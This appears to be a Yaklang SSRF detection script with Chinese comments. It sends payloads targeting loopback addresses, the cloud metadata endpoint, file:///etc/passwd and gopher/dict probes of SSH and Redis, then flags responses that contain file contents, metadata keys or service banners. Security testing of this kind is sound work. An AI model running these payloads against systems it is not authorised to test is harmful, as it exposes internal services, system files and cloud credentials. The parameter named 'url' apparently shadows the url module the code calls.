__DESC__ = "简单的 SSRF 漏洞检测脚本"
__VERBOSE_NAME__ = "SSRF 简单检测"

// 获取目标 URL
target = cli.String("target", cli.setDefault("http://example.com/api?url="))
cli.check()

// SSRF 测试 payloads
payloads = [
    "http://127.0.0.1/",
    "http://localhost/",
    "http://169.254.169.254/latest/meta-data/",
    "file:///etc/passwd",
    "dict://127.0.0.1:22/",
    "gopher://127.0.0.1:6379/_INFO",
]

// 检测函数
testSSRF = func(url, payload) {
    testUrl = sprintf("%s%s", url, url.QueryEscape(payload))
    println(sprintf("[*] 测试: %s", testUrl))
    
    rsp, req, err := http.Get(testUrl)
    if err != nil {
        return
    }
    
    // 检查响应中是否包含 SSRF 特征
    body = string(rsp.Body)
    
    // 检测本地文件读取
    if str.Contains(body, "root:") || str.Contains(body, "[extensions]") {
        risk.NewRisk(
            testUrl,
            risk.title("SSRF 漏洞 - 文件读取"),
            risk.severity("high"),
            risk.type("ssrf"),
            risk.payload(payload),
            risk.request(req),
            risk.response(rsp),
        )
        println(sprintf("[+] 发现 SSRF: %s", payload))
        return
    }
    
    // 检测云元数据
    if str.Contains(body, "instance-id") || str.Contains(body, "ami-id") {
        risk.NewRisk(
            testUrl,
            risk.title("SSRF 漏洞 - 云元数据读取"),
            risk.severity("critical"),
            risk.type("ssrf"),
            risk.payload(payload),
            risk.request(req),
            risk.response(rsp),
        )
        println(sprintf("[+] 发现 SSRF: %s", payload))
        return
    }
    
    // 检测内网服务响应
    if str.Contains(body, "SSH") || str.Contains(body, "Redis") || str.Contains(body, "MySQL") {
        risk.NewRisk(
            testUrl,
            risk.title("SSRF 漏洞 - 内网服务探测"),
            risk.severity("high"),
            risk.type("ssrf"),
            risk.payload(payload),
            risk.request(req),
            risk.response(rsp),
        )
        println(sprintf("[+] 发现 SSRF: %s", payload))
        return
    }
}

// 主程序
println(sprintf("[*] 开始 SSRF 检测: %s", target))
for _, payload = range payloads {
    testSSRF(target, payload)
    sleep(0.5)
}
println("[*] 检测完成")
